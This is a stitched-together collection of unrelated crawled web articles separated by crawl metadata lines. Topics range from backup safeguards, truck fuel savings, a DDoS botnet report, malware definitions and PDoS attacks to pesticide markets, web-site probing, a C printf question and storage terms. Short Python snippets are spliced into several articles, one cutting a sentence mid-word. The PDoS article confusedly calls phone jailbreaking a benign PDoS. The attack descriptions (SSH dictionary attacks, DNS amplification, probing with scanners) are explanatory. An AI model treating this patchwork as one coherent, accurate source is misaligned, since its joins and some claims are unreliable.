It is an entity’s formal assessment of the sensitivity, vulnerabilities and security of its programs and the information it receives, manipulates, stores or transmits. This procedure begins with an application and data inventory. - Contingency Operations (Physical Safeguard): Contingency operations establish (and implement as needed) procedures that allow facility access in support of restoration of lost data under the disaster recovery plan and emergency mode operation plan in the event of an emergency. Physical security is a critical aspect of disaster and business continuity planning. Administrative controls for physical access to enable contingency operations must be in place so recovery can proceed as defined in plans. - Data Backup and Storage (Physical Safeguard): Continual and consistent backup of data is required, as one cannot be sure when an organization may experience some disaster that will require access to data that has been backed up. Data may also be lost or corrupted, hence a good data backup plan is important. Data backup methods include full, incremental or differential. Data backup and storage addresses questions such as: Where will the media be stored? What is the media-labeling scheme? How quickly will data need to be recovered in the event of an emergency? How long will data be retained? What is the appropriate media type used for backup? - Emergency Access Procedures (Technical Safeguard): Establish and implement procedures for obtaining necessary sensitive business information during an emergency. Emergency access is a requisite part of access control and will be necessary under emergency conditions, although these may be very different from those used in normal operational circumstances. For example, in a situation where normal environmental systems, including electrical power, have been severely damaged or rendered inoperative due to a disaster, procedures should have been established beforehand to provide guidance on possible w
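The full/incremental/differential distinction mentioned above comes down to which reference point each backup run compares file modification times against. A small illustrative sketch (the file names and timestamps are hypothetical, and real backup software tracks archive bits or change journals rather than raw mtimes):

```python
def select_files(files, last_full, last_backup, mode):
    """Pick which files a backup run should copy.

    files       -- mapping of file name -> last-modified timestamp
    last_full   -- timestamp of the most recent FULL backup
    last_backup -- timestamp of the most recent backup of any kind
    mode        -- "full", "differential", or "incremental"
    """
    if mode == "full":
        return sorted(files)  # everything, every time
    if mode == "differential":
        # everything changed since the last FULL backup; sets grow until the next full
        return sorted(f for f, mtime in files.items() if mtime > last_full)
    if mode == "incremental":
        # only what changed since the last backup of ANY kind; smallest sets
        return sorted(f for f, mtime in files.items() if mtime > last_backup)
    raise ValueError("unknown backup mode: " + mode)

files = {"ledger.db": 170, "policy.doc": 120, "logo.png": 50}
# Suppose the last full backup ran at t=100 and an incremental ran at t=150:
print(select_files(files, 100, 150, "differential"))  # ['ledger.db', 'policy.doc']
print(select_files(files, 100, 150, "incremental"))   # ['ledger.db']
```

The trade-off this illustrates is exactly the one a backup plan must weigh: incrementals are cheap to take but slow to restore (every set since the last full must be replayed), while differentials restore from just two sets at the cost of larger nightly copies.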
Long haul tractor trailers are a fixture of the American landscape, delivering all manner of supplies from one end of the country to the other. The estimated 1.3 million Class 8 long-haul trucks on this country's roadways carry approximately 70 percent of all freight and use more than 20 percent of all fuel consumed in the US. Big rigs are essential to the country's economy, but there is a price to pay in the form of a big environmental footprint. Most trucks only get about 6 miles to the gallon, and altogether they emit about 423 million pounds of CO2 into the atmosphere each year.

[Image: Supercomputing simulations at Oak Ridge National Laboratory enabled SmartTruck Systems engineers to develop the UnderTray System, some components of which are shown here. The system dramatically reduces drag, and increases fuel mileage, in long-haul trucks. Image credit: Michael Matheson, Oak Ridge National Laboratory]

An HPC-developed technology could help save billions of gallons of fuel each year. In 2011, South Carolina-based BMI Corp. partnered with researchers at Oak Ridge National Laboratory (ORNL) to develop the SmartTruck UnderTray System, "a set of integrated aerodynamic fairings that improve the aerodynamics of 18-wheeler (Class 8) long-haul trucks." After installation, the typical big rig can expect to achieve a fuel savings of between 7 and 12 percent, amounting to about $5,000 in annual fuel costs. The effort has been going strong since 2011. Last week, the Oak Ridge Leadership Computing Facility (OLCF) announced that BMI-offshoot SmartTruck Systems has sold more than 25,000 UnderTray Systems to trucking fleets in North America. Mike Henderson, chief executive officer and founder of BMI and SmartTruck's chief scientist, observes: "If all of the 1.3 million Class 8 trucks in the country were configured with just the minimum package of new components, the U.S. could annually save almost 1.5 billion gallons of diesel fuel, reduce CO2 by 16.5 million tons and save more than $6 billion in fuel costs." Simulating a technology like this requires some heavy-duty HPC smarts. That's what led SmartTruck engineers to the Oak Ridge Leadership Computing Facility and the Cray Jaguar supercomputer. Using a National Aeronautics and Space Administration (NASA) application code, they studied the airflow around the 18-wheelers and identified a way to significantly reduce drag through the addition of an aftermarket component. With Jaguar, the time it took to model these components went from days (using a modest in-house cluster) to mere hours. BMI/SmartTruck was able to go from concept to production in just 18 months instead of the 3.5 years it had anticipated. Recently, SmartTruck president Mike Henderson revealed the company was tapping the HPC resources of another OLCF machine, Titan (the new-and-improved Jaguar). Henderson needs to ensure that trucks passing through California satisfy state air quality laws. Specifically, the law requires that all trucks be outfitted with low-rolling-resistance tires and other aerodynamic devices to boost fuel efficiency. Solving these problems takes complex simulations paired with the most powerful supercomputers. SmartTruck's bold plans are part of a national push to create more fuel-efficient vehicles. The Department of Energy's Super Truck Program, for example, aims to improve the fuel mileage of Class 8 trucks by 50 percent by 2015. Given the current average of 5.5 to 6.5 MPG, a 50 percent increase could save about $25,000 annually per truck (based on traveling 120,000 miles per year), which would reduce greenhouse gas emissions by 35 percent for each truck. SmartTruck, which currently employs more than 25 people, has doubled in size each year since 2011.
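The per-truck dollar figures above follow from simple fuel arithmetic. A quick sanity check of the Super Truck Program estimate (the ~$4/gallon diesel price is an assumption of this sketch, not a figure from the article):

```python
def annual_fuel_savings(miles_per_year, baseline_mpg, improvement, price_per_gallon):
    """Gallons and dollars saved per year when fuel economy rises by
    `improvement` expressed as a fraction (0.5 = +50 percent)."""
    improved_mpg = baseline_mpg * (1 + improvement)
    gallons_saved = miles_per_year / baseline_mpg - miles_per_year / improved_mpg
    return gallons_saved, gallons_saved * price_per_gallon

# Class 8 truck: 120,000 miles/year at ~6 MPG, a 50% efficiency gain,
# and an assumed ~$4.00/gallon diesel price.
gallons, dollars = annual_fuel_savings(120_000, 6.0, 0.5, 4.00)
print(round(gallons))  # ~6,667 gallons/year
print(round(dollars))  # ~$26,700/year, in line with the ~$25,000 figure cited
```

Note the diminishing-returns shape: because fuel use scales with 1/MPG, a 50 percent MPG improvement cuts fuel consumption by only a third, not a half.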
According to the recent announcement from OLCF, “UnderTray Systems have a quick payback period and a favorable return on investment, so fleets have strong incentive to upgrade trailers with the components, which are manufactured entirely in the USA and are 100 percent recyclable.”
Today is "Take Our Sons and Daughters to Work Day," a non-profit educational program that encourages parents to take their children to work for one day to explore career options, boost their self-esteem and bond with their parents. Originally, this holiday was geared only towards daughters to encourage the support of women in the workplace, but eventually it was expanded to include sons as well. By exposing your children to your profession, we can inspire a new generation of talent in the workforce and encourage them to pursue the career path of their dreams. Though it's wonderful that we have a designated holiday for this cause, wouldn't it be great for children to learn more about other professions, even outside of their parents' given jobs? With HD video communications, classrooms can be transported to any company around the world and students can meet with experts in a variety of fields to expand their career knowledge. Wouldn't it be amazing to introduce a classroom full of students in a rural town to an astronaut, a diplomat or the CEO of a Fortune 500 company? Imagine the kind of lessons they could learn from these industry leaders! It's the kind of lesson you could never learn in a textbook. For example, one high school in the Barrow County School District connected with a nanotechnology professor at Georgia Tech for a semester-long project. One student was so inspired by the project and the field of nanotechnology that she applied to Georgia Tech and was accepted into the program. Without video, this student would have never realized her dream of becoming a scientist! Of course, there's no replacement for the kind of bond a parent has with his or her child, and Take Your Kids to Work Day is a wonderful way to encourage that bond. But let's think even bigger than simply one day a year! With the power of video technology, your kids can experience careers they've only dreamed about.
Will you be celebrating “Take Your Kids to Work Day?” We’d love to hear about your experience in the comment box below.
A blended DDoS botnet consisting of both Windows and Linux machines has been detected by researchers working with the Polish CERT. The botnet is exclusively dedicated to mounting DDoS attacks, mainly DNS amplification attacks. "This means that the attackers were interested only in infecting machines which have a significant network bandwidth, e.g. servers," they noted. "This is also probably the reason why there are two versions of the bot – Linux operating systems are a popular choice for server machines." As far as they can tell, attackers breached the affected Linux machines by way of a successful SSH dictionary attack, then logged in and downloaded, installed and executed the bot. The Linux version of the bot tries to connect to the C&C server via a high TCP port. "Both the C&C's IP and port are encrypted," they explained in a blog post. "Upon running, the bot sends operating system information (using uname function), unencrypted and waits for commands." After analysing the malware, they concluded that it can launch four types of DDoS attack, and that it has functions that haven't yet been implemented. The bot targeting the Windows OS works a bit differently. Once on the computer, it drops an executable and runs it, which causes a persistent Windows service dubbed DBProtectSupport to be registered and started. This bot also contacts the C&C server on a high TCP port, but it first needs to send a DNS query to the 22.214.171.124 server to learn the C&C's IP address. It then "informs" the server of the target system's details by compiling and sending a text file. "This text file, along with the fact that the same C&C IP was used in both malware samples make us believe that it was created by the same group," the researchers concluded. But while Linux users can secure their machines against this attack by choosing stronger SSH passwords, the researchers haven't mentioned how the Windows systems get compromised in the first place.
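DNS amplification works because a small spoofed query elicits a much larger response aimed at the victim, and the attack's leverage is usually summarized as an amplification factor. A back-of-the-envelope sketch; the byte sizes below are typical illustrative values, not measurements from this particular botnet:

```python
def amplification_factor(query_bytes, response_bytes):
    """Bytes delivered to the victim per byte the attacker sends.

    The attacker spoofs the victim's IP as the source of a small UDP
    query, so the (much larger) DNS response lands on the victim.
    """
    return response_bytes / query_bytes

# A ~64-byte "ANY" query against a resolver with large (e.g. DNSSEC-signed)
# records can trigger a response of ~3,000 bytes.
factor = amplification_factor(64, 3000)
print(round(factor, 1))  # ~46.9x: each bot multiplies its bandwidth ~47-fold
```

This is why the researchers note the attackers targeted well-connected servers: the victim-facing traffic is the bot's upstream bandwidth multiplied by this factor.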
On 19 August, Sun Microsystems and some of its partners announced the shipment of the Mobile Information Device (MID) standard, based on the Java programming language (Java 2 Platform, Micro Edition, or J2ME), for use on mobile phones. At the same time, Motorola, one of the biggest companies in the development of wireless technologies, released an application programming interface (API) allowing for the development of additional programs for its wireless devices. This may seem to most people to be just a collection of abstract technical terms; however, the significance of this event cannot be overstated, because it is an important milestone in the evolution of mobile phone functionality. The further integration of the Java programming language will enable third-party applications to be used on mobile phones and, respectively, will allow end users to write their own programs and to share those applications across wireless networks. It is certainly a huge step forward on the way to developing mobile phones from just a connection medium into a multipurpose communication portal. Java technology allows wireless devices to be powered by nearly any additional application, limited only by the equipment's functional capability. It dramatically enhances the overall consumer experience by turning static text into interactive, graphical, easy-to-use services. Nevertheless, there is another side to this story: the new functionality provides an excellent opportunity not only for writing useful programs, but also malicious ones. Currently, computer viruses attack mobile phones only indirectly (for instance, by sending obtrusive SMS messages). In the future, however, viruses will almost certainly appear that live directly in mobile phones. How real is this possibility? "We define three main conditions for the existence of a virus. Firstly, popularity of the platform or equipment. Secondly, availability of the development tools.
And thirdly, insufficient protection," comments Den Zenkin, Head of Corporate Communications for Kaspersky Lab. "In this case, only the first two conditions are fully met. As far as the last condition is concerned, we see this exactly as what can prevent viruses from being the same threat to mobile phones that they are to PC users today." Java technology has already proved that it is reliable and secure. During the years it has existed, only a few Java viruses have been detected, and these were more conceptual than posing a real danger. The Java operating principle, based on providing a secured virtual space for each application, almost fully mitigates any possibility of viruses appearing in the wild for this platform. "We haven't got any cause to believe that J2ME is less secure than any other version of Java. However, before making a definitive conclusion, we need time for a number of tests," said Eugene Kaspersky, Head of Anti-Virus Research. "Even if J2ME proves to be an absolutely secure platform, one of the most vulnerable areas in any security system still exists - the human factor. This problem, in turn, can be improved only by constant education."
Linear alkylbenzene (LAB) is a vital ingredient for synthetic detergents. Nearly 98% of LAB production is used to manufacture linear alkylbenzene sulfonate (LAS), which is used in household synthetic detergents. The remaining 2% of the demand for LAB comes from other applications, such as agricultural herbicides, emulsion polymerization, wetting agents, electric cable oil, ink solvents, and the paint industry. The global linear alkylbenzene market was valued at $5,900.3 million in 2012, and is projected to reach $7,770.7 million by 2018, at a CAGR of 4.7% for the given period. This growth will be heavily driven by developing regions because of low penetration and low per capita expenditure on detergents. Alkylbenzene is also known as detergent alkylate, and is converted to linear alkylbenzene sulfonate (LAS), which is mainly used as a surfactant in detergents and cleaning products. Linear alkylbenzene is most commonly used as a raw material in the production of biodegradable household detergents. It is mainly produced from n-paraffins, kerosene and benzene. A huge portion of alkylbenzene is converted to linear alkylbenzene sulfonate (LAS), an anionic surfactant used mainly in household laundry and cleaning products, and in some industrial applications. Heavy-duty laundry liquids, principally used for commercial laundry purposes, are the most dominant users of LAS. Alkylbenzene in small proportion is employed in the manufacture of ink, agricultural herbicides, paints, wetting agents and electric cable oil. It is estimated that about 3,752.7 KT of alkylbenzene was consumed globally in 2012, and this demand is expected to reach 4,339.1 KT by 2018, at an estimated CAGR of about 2.5% from 2013 to 2018. However, the overall market value of alkylbenzene was estimated at about $5,900.3 million in 2012 and is projected to grow at a CAGR of 4.7% during the forecast period. The key regions covered in the market report are Asia-Pacific, Europe and North America.
The various applications studied include linear alkylbenzene sulfonate (LAS) and others. Further, as part of the qualitative analysis, the global linear alkylbenzene market research report provides a comprehensive review of the important drivers, restraints, opportunities, and issues in the market. The report also provides an extensive competitive landscape of the companies operating in this market, including company profiles and the competitive strategies adopted by various market players, comprising BASF SE, BP PLC (U.S.), Total S.A., ExxonMobil Corp., The Dow Chemical Company, CPCC, CNPC, JX Nippon Oil and Energy Group, Royal Dutch Shell and SABIC. Along with the market data, MMM assessments can be customized to meet a company's specific needs. Customization covers comprehensive industry standards and deep-dive analysis of the following parameters:
- Market size and forecast
- Consumption pattern (in-depth trend analysis), by application (country-wise)
- Competitive landscape, with a detailed comparison of each company's portfolio mapped at the regional and country level
- Market size in terms of volume (application-wise and country-wise)
- Production data at the country level
- Comprehensive coverage of plant capacity estimates to analyze the future prospects of the linear alkylbenzene market
- Plant capacities for major countries (by company)
- Analysis of load factor to understand actual production at the country level
- Deep-dive value chain analysis
- Raw materials used in making linear alkylbenzene
- Analysis of forward and backward chain integration to understand the business approach prevailing in the linear alkylbenzene market
- Impact analysis: detailed analysis of the various drivers and restraints and their impact on the market
- The various new opportunities for emerging players
- Detailed analysis of competitive strategies (new product launches, expansions, mergers & acquisitions, etc.) adopted by various companies and their impact on the linear alkylbenzene market
- Trade analysis: trade data and import-export data, by country

Europe Linear Alkylbenzene
The European linear alkylbenzene market was valued at $936.8 million in 2012, and is projected to reach $1,139.8 million by 2018, growing at a CAGR of 3.2% from 2013 to 2018.

Asia-Pacific Linear Alkylbenzene
The Asia-Pacific linear alkylbenzene market was valued at $2,652.0 million in 2012, and is projected to reach $3,530.0 million by 2018, growing at a CAGR of 5.0% from 2013 to 2018.
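The regional projections above are all compound-annual-growth-rate extrapolations. A sketch reproducing the global figure; small differences against the report's numbers are expected, since the published CAGRs are themselves rounded:

```python
def project(value, cagr, years):
    """Compound a starting value forward at a constant annual growth rate."""
    return value * (1 + cagr) ** years

# Global market: $5,900.3M in 2012 at a 4.7% CAGR through 2018 (6 years)
global_2018 = project(5900.3, 0.047, 6)
print(round(global_2018, 1))  # ~7772, close to the reported ~$7,770M

# Asia-Pacific: $2,652.0M in 2012 at a 5.0% CAGR through 2018
apac_2018 = project(2652.0, 0.05, 6)
print(round(apac_2018, 1))    # ~3554, versus the reported $3,530.0M
```

The small gaps against the reported end values are consistent with the CAGRs being rounded to one decimal place in the source.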
A computer worm is a type of malware that is capable of propagating or replicating itself from one system to another. It can do this in a number of ways. Unlike viruses, worms don't need a host file to latch onto. After arriving and executing on a target system, a worm can perform a number of malicious tasks, such as dropping other malware, copying itself onto devices physically attached to the affected system, deleting files, and consuming bandwidth. Downloaders and droppers are helper programs for various types of malware such as Trojans and rootkits. Usually they are implemented as scripts (VB, batch) or small applications. They don't carry out any malicious activity themselves, but open the way for an attack by downloading/decompressing and installing the core malicious modules. To avoid detection, a dropper may also create noise around the malicious module by downloading/decompressing some harmless files. Very often, they delete themselves after the goal has been achieved. A Trojan is malware that uses simple social engineering tricks to tempt users into running it. It may pretend to be other, legitimate software (spoofing products by using the same icons and names), or it may come bundled with a cracked application or even with freeware. Once installed on the computer, it performs malicious actions such as backdooring the computer, spying on its user, and doing various types of damage. Trojans are not likely to spread automatically; they usually stay on the infected host only. Toolbars are software extensions that are visible in the GUI of the host program. In the case of PUPs, the host program is usually a browser. The visible part of the toolbar can vary from one extra button added to the browser's own taskbar to a bar spanning the full width of the top of the browser window.
Sweet Orange is an exploit kit: malicious code, placed on compromised websites, that probes a visitor's computer for vulnerabilities through which it can be infected. In addition to compromised websites, the operators also run deliberate traps that users get redirected to. Sweet Orange also uses malvertising, in which malicious advertisements are placed on legitimate websites.
Pokémon Go might be the latest fad, but as the school year draws near, many are wondering if the game can be beneficial to students. With the rise of games in the classroom, it seems like a no-brainer to bring Pokémon Go into the classroom. But how can teachers do it? Here are four ways Pokémon Go has been beneficial for teachers, students, and schools. - It’s brought augmented reality (AR) to the forefront. Augmented reality has the possibility to radically change the classroom. Learning about Ancient Rome? Forget looking at artist renderings in a textbook; just take a virtual field trip. Pokémon Go has brought AR into the mainstream and shown its capabilities and the ability to put the technology to use on a large scale. - Teachers can engage students with data. In the game, players are exposed to mountains of data, from how many Pokémon they’ve caught, to where to catch Pokémon, to whether their Pokémon have evolved. K-12 teachers can turn this data into an engaging lesson on statistics, or on a basic level, how to accurately capture and record data. - Creative writing prompts galore. As students spend their free time trying to catch ’em all, English/Language Arts teachers can use students’ exploration and quests to their advantage. Using their Pokémon hunts and battles as writing prompts, teachers can engage students with the written word. Since Pokémon Go already takes place in a fantastical, magical setting, it is well suited to sparking a student’s imagination. - Students can explore the world around them. Pokémon Go offers teachers the opportunity to teach students about the world around them. One major benefit of Pokémon Go is that it requires players to get up and go. They have to walk, explore, and move around to capture and hatch their Pokémon. Teachers can use this to discuss weather patterns, season changes, or even discuss the city or state they live in. 
Exploring a student’s community can springboard into discussions of climate change or even local history. Sure, teachers won’t want students playing Pokémon Go in the classroom, but teachers who ignore it entirely will miss out on valuable teaching opportunities. Any learning suggestions you would add? Let us know in the comments!
<urn:uuid:3fde1099-3503-4914-9a43-12b605da42f3>
CC-MAIN-2017-04
https://www.meritalk.com/articles/4-ways-teachers-can-use-pokemon-go/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280850.30/warc/CC-MAIN-20170116095120-00406-ip-10-171-10-70.ec2.internal.warc.gz
en
0.950523
461
3.25
3
The east coast of the United States is bracing for a hurricane so severe that it's being dubbed a "Frankenstorm" in many media outlets. Indeed, Hurricane Sandy -- "a late season Atlantic storm unlike anything seen in more than two decades," according to Reuters -- has killed more than 30 people in the Caribbean as it slowly moves north. Obviously you can keep track of the storm via television and Internet news outlets, but if you want information heavy on facts and light on sensationalism, NASA has a website devoted to tracking Sandy. The space agency's Earth-orbiting spacecraft are watching Hurricane Sandy as it churns at 6 mph toward the east coast, where it's expected to make landfall late Monday or Tuesday. The site has the latest videos and pictures taken from space. Here's how NASA describes the storm: Storm surge is expected to be a big factor as Sandy approaches the Mid-Atlantic coast. Very rough surf and high and dangerous waves are expected to be coupled with the full moon. The National Hurricane Center noted that the combination of a dangerous storm surge and the tide will cause normally dry areas near the coast to be flooded by rising waters. The water could reach the following depths above ground if the peak surge occurs at the time of high tide. Some storm surge forecasts include: 5 to 8 feet in the hurricane warning area in the Bahamas and 1 to 3 feet along the Florida coast in the warning areas on Oct. 26. As of this writing, the hurricane has passed through the Bahamas, but there are no details yet about damage or fatalities. Here's a link to a video of Sandy taken Friday from the International Space Station. You also can watch the video below, depending on whether it shows up. (I see it using Firefox, but not Chrome.)
<urn:uuid:b9e1b7fe-81f4-4aa9-874e-a8657f4573a5>
CC-MAIN-2017-04
http://www.itworld.com/article/2719510/hardware/watch-hurricane-sandy-from-nasa-s-orbiting-satellites.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280280.6/warc/CC-MAIN-20170116095120-00434-ip-10-171-10-70.ec2.internal.warc.gz
en
0.959547
360
3.125
3
A PDoS, or permanent denial-of-service, also referred to as phlashing, is a severe attack that damages a system so badly that reinstallation or replacement of its hardware is required. A PDoS attack exploits security flaws that permit remote administration on the management interfaces of the victim's hardware, such as printers, routers, or other networking devices. If you own an iPhone or similar device, it's very likely that you have heard of, or performed, the jailbreak process in order to control your device more fully than the manufacturer wants you to. By flashing past the device's hardware and software limitations, replacing parts of the ROM, you can install unapproved apps and change settings that a stock device does not allow. The functions made possible by jailbreaking a phone are, in a benign sense, a form of PDoS: permanent denial of service changes hardware settings at the deep, closed ROM level and allows the hardware to perform new, perhaps prohibited, tasks that the manufacturer had locked out. In its other, malicious form, a PDoS uses the same technique to destroy the functionality of a hardware component and thereby cripple the overall function of the device. A PDoS is an attack in which hardware is directly targeted, and it does not require many resources; it's a fast attack. Many would-be hackers are attracted to this method because of these features and the high probability of security exploits on Network Enabled Embedded Devices (NEEDs). Unlike the infamous distributed denial-of-service (DDoS) attack, which is used to sabotage a service or website or as a cover for malware delivery, PDoS is pure hardware sabotage.
As an anecdote: at the 2008 EUSecWest Applied Security Conference in London, Rich Smith, an employee of Hewlett-Packard's Systems Security Lab, presented a tool called PhlashDance, created to detect and demonstrate PDoS vulnerabilities.
<urn:uuid:3fa1d438-4ba5-418b-b9b0-0987f9446a9b>
CC-MAIN-2017-04
https://howdoesinternetwork.com/2012/permanent-dos
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952075
445
2.65625
3
The South American crop protection chemicals market has been estimated at USD 14.1 Billion in 2015 and is projected to reach USD 19.6 Billion by 2020, at a CAGR of 6.83% during the forecast period from 2015 to 2020. Crop protection chemicals, also called pesticides, constitute a class of agrochemicals that are used to kill plant-harming organisms like pests, weeds, rodents, and nematodes, preventing the destruction of crops by them. Any material or mixture that is capable of preventing, destroying, repelling or mitigating a pest can be called a pesticide. Herbicides, insecticides, insect growth regulators, nematicides, termiticides, molluscicides, piscicides, avicides, rodenticides, predacides, bactericides, insect repellants, animal repellants, antimicrobials, fungicides, disinfectants, sanitizers and their biological counterparts all come under the classification of pesticides. Pesticides are used on crops as well as non-crop plants like turfs and ornamentals. They can be broadly classified into four groups depending on their usage. Farmers use herbicides for killing unwanted plants called weeds, insecticides for killing insects, fungicides for treating diseases caused by fungi, and other pesticides for treating diseases that are not caused by fungi or insects. Herbicides accounted for more than 54% of total pesticide sales in 2015. The pesticides market is driven by the need to increase crop yield and efficiency. The region’s population is growing, but farmlands have been decreasing, pushing farmers to increase their yields. New farming practices are adopted by farmers to increase crop yields. Genetically modified (GM) plants have helped farmers increase their yields, coupled with a reduction in the use of some pesticides. Biopesticide adoption is also occurring across the region, especially in the developing countries of Brazil and Argentina.
Demand for organic and completely natural foods is increasing at a high rate, and biopesticide consumption will inevitably rise with it. Pesticides help in the optimal usage of resources for plant growth and protect the crop from various pathogens. Some pesticides use pheromones to repel approaching animals. New farming practices require new crop protection products. Research and development costs are escalating; as a result, companies' investment in new products is high and they are wary of returns. Per capita usage of pesticides is low in developing countries because of costs. This poses a threat to companies, as their market reach might not follow desired growth patterns. Shrinking farmlands are also a threat, in the form of lower pesticide usage. The market is classified based on application into herbicides, fungicides, insecticides and other pesticides. These are further segmented depending on their chemical origin: biopesticides and synthetic pesticides. A diverse range of pesticides is used in agriculture and farming. Pesticides are also segmented by their usage in crops like cereals, fruits etc. Non-crop utilization of pesticides in turfs, ornamentals and others is also studied. The market study indicated that cereals and grains account for the largest share of pesticide use. This can be attributed to food-security concerns and the wide variety of uses for cereals and grains. The market is also segmented geographically into Brazil, Argentina and others. Brazil has the largest consumer base in the world; Argentina follows. Rising disposable income levels, a rising population and food security have made Brazil the country with the maximum potential for growth. Low affordability and the explicit cost-cutting measures of farmers in developing and underdeveloped countries hinder the real potential of the market. Decreasing farmlands and an increasing population pose a serious threat to food security.
Recently, grains have also been used to produce biofuel, and this poses a risk to food security, especially in developing and underdeveloped regions where price drastically influences consumption. Pesticides help to increase farm yields and still have large scope to improve the overall agricultural production of the region. The major companies in crop protection chemicals are Syngenta, Bayer, BASF, DuPont, Dow AgroSciences, Monsanto etc. For major companies, the current route to survival in the market is research and innovation. Major companies also export to these countries many pesticides that are banned in the USA. All major companies are investing heavily in new product development to keep up with competition and gain market share. Pesticides have been central to increasing agricultural yields and will remain so in the coming years. Key Deliverables in the Study
<urn:uuid:54cde492-aa7b-48d9-b99e-bb03c1bb9578>
CC-MAIN-2017-04
https://www.mordorintelligence.com/industry-reports/latin-america-crop-protection-pesticides-market-industry
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz
en
0.955879
907
3.046875
3
Site scanning/probing is the initial phase of any attack on Web applications. During this phase, the attacker gathers information about the structure of the Web application (pages, parameters, etc.) and the supporting infrastructure (operating system, databases, etc.). Target Web sites are scanned for known vulnerabilities in infrastructure software (such as IIS) as well as unknown vulnerabilities in the custom code developed for the specific target application. Site scanning/probing is the main technique attackers use to gather as much information as possible about a Web application and the supporting infrastructure. A standard site scan is composed of several steps. First, the attacker detects the operating system installed on the server. This can be done using automatic tools like nmap, by identifying the Web server type in the HTTP response headers (for example, IIS runs on Windows-based sites) or by guessing according to file extensions. (Usually, Windows-based sites use ".htm" and ".jpg" files, whereas UNIX sites use ".html" and ".jpeg" files.) Identifying which Web server runs on the target machine is very useful to the attacker. Knowing the specific type of Web server (and by extension its default configuration), an attacker may try to exploit known vulnerabilities, access sample files, and try default user accounts. There are three common ways of detecting the Web server: by using automatic tools such as Nikto, by identifying the Web server type in the HTTP response headers, or by guessing according to file suffixes (ASP pages normally indicate an IIS server, whereas PHP pages normally indicate an Apache server). Additional important information about the infrastructure of the target server can be gathered using probing techniques such as path revealing, directory traversal and remote execution (which may allow mapping the entire site and its source).
The attacker can complete the infrastructure knowledge base by identifying database server types, content infrastructure types (WebSphere, BroadVision and Vignette), and so on. After the attacker analyzes the infrastructure, the entire application can be scanned. Application scanning provides a map of the entire site including: all pages, parameters used by dynamic pages, cookies used by the site and transaction flow. This information leads the attacker to an understanding of the application's authentication, authorization, logic, and transactional mechanisms. This body of information provides the basis of a strategy to attack the target site.

Solution                        Blocks site probing?
Imperva SecureSphere            Yes (known and unknown attacks)
Firewalls                       Some/partial (known attacks only)
Intrusion Detection Systems     Partial detection only, known attacks only
Intrusion Prevention Systems    Partial (known attacks only)

During site probing the attacker performs several operations:

Generating errors using non-existing URLs. This type of activity can only be detected by products that learn which URLs are allowed by each specific application. Intrusion Detection and Prevention Systems that are not Web-application oriented do not implement this capability.

Providing long parameter values. In order to detect long parameter values, the product must know the length constraints on each parameter. This requires learning parameters' constraints. Intrusion Detection and Prevention Systems that are not Web-application oriented do not implement this capability.

Accessing unauthorized parts of the application. In order to detect unauthorized access (e.g. to /iisadmin/ and /iissamples/), the product must learn which parts of the application are authorized and which are not. Only products that include learning capabilities can gain that knowledge.
Adding and removing parameters. To detect this behavior, the product must understand which parameters are used with each specific URL and which are required. Intrusion Detection and Prevention Systems that are not Web-application oriented do not implement this capability.
<urn:uuid:12dbf049-66d8-4afb-975f-927092ef38b4>
CC-MAIN-2017-04
https://www.imperva.com/Resources/Glossary?term=site_scanning_probing
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00158-ip-10-171-10-70.ec2.internal.warc.gz
en
0.876206
763
2.9375
3
That's because %u is an "unsigned int" -- but you've used a (signed) long long instead of an unsigned int. You need to use %lld (ll=long long, d=integer).

printf("num = %017lld\n", num);

On 1/29/2010 5:20 PM, hockchai Lim wrote:
ok. Now, I'm having problem converting this long long (64 bits) num back to a string. I use %017u and it gives me a 00000000000000001. Why oh why (can't c be a bit smarter :).

long long num;
sprintf(sBuf, "6027461692 ");
num = atoll(sBuf);
printf("num = %017u\n", num);
// the result num = 00000000000000001
<urn:uuid:5ebec5ef-b82c-454b-b13c-dc149a473150>
CC-MAIN-2017-04
http://archive.midrange.com/c400-l/201001/msg00017.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00278-ip-10-171-10-70.ec2.internal.warc.gz
en
0.705168
184
2.546875
3
Use this handy cheat sheet to help keep straight the evolving list of storage terminology.

Direct-attached storage (DAS): Storage connected directly to a server.

Fibre Channel: An expensive short-distance networking technology used for building SANs.

ATA (AT Attachment) or IDE (Integrated Drive Electronics): Traditional desktop and low-end server storage technology that includes the controlling circuitry for mass-storage devices as part of the devices. This technology is one of the standard ways of connecting hard drives, CD-ROM drives, and tape drives to a system.

iSCSI: A low-cost way to create SANs over IP networks.

IP SAN: A SAN built around the iSCSI protocol.

Network-attached storage (NAS): A storage appliance that connects to the Ethernet network and provides file-level storage access.

RAID (Redundant Array of Inexpensive Disks): The name for a number of different fault-tolerance schemes that use drive arrays.

SCSI (Small Computer System Interface): The de facto standard for midrange and high-end server direct-attached storage.

Serial ATA (SATA): A new low-cost storage standard with faster transfer speeds than IDE/ATA.

Serial-attached SCSI: A new high-performance SCSI standard. Products will appear late this year.

Storage area network (SAN): Typically a Fibre Channel subnetwork of storage devices that can be shared by several servers.
<urn:uuid:216fd431-5fc8-43fb-887c-c9977cb0deaf>
CC-MAIN-2017-04
http://www.eweek.com/c/a/Data-Storage/Know-Your-Storage-Technologies
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00094-ip-10-171-10-70.ec2.internal.warc.gz
en
0.868124
316
2.734375
3
